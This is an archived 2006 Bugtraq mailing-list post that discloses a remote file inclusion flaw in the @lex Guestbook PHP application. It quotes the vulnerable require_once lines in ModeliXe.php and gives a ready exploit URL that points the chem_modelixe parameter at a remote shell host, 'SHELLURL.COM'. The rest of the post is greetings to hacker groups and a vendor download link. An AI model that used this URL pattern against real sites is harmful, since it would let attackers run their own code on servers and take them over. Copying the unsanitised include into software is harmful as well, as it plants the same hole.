[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061014012410.18369.qmail@securityfocus.com>
Date: 14 Oct 2006 01:24:10 -0000
From: xp1o@....com
To: bugtraq@...urityfocus.com
Subject: @lex Guestbook <=(ModeliXe.php) Remote File Inclusion Exploit
#=======================================================================
=======================
#@lex Guestbook <=(ModeliXe.php) Remote File Inclusion Exploit
#=======================================================================
========================
#Bug in :ModeliXe.php
#
#
#Vlu Code :
#--------------------------------
#
#require_once($chem_modelixe.'Mxconf.php');
#require_once($chem_modelixe.'ErrorManager.php');
#
#
#=======================================================================
=========================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com/[scerpitPath]/templates/modelixe/Mxconf.php?chem_modelixe=http://SHELLURL.COM
#
#
#
#=======================================================================
=========================
#Discoverd By : MoHaNdKo
#
#Conatact : xp1o (at) msn (dot) com [email concealed]
#or
#
# wWw.xP10.CoM & wWw.TRyaG.CoM
#
#Greetz : ( abo"ROOT SHELL " nora ) & 3abdalah & dr.7zn & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF &
#
#abu melaf & mohagr22 & metoovet & fuck_net & hitler-jeddah & El3alMy & ToOoFA & Le CoPrA
#
#FaTaL & foooooz & elwa7sh elkasr & cRiMiNaL NeT
#
# and all member on xp10.com and tryag.com and lezr.com
========================================================================
==========================
vendor:
http://www.alexphpteam.com/telecharger/alex_guestbook4.zip
Powered by blists - more mailing lists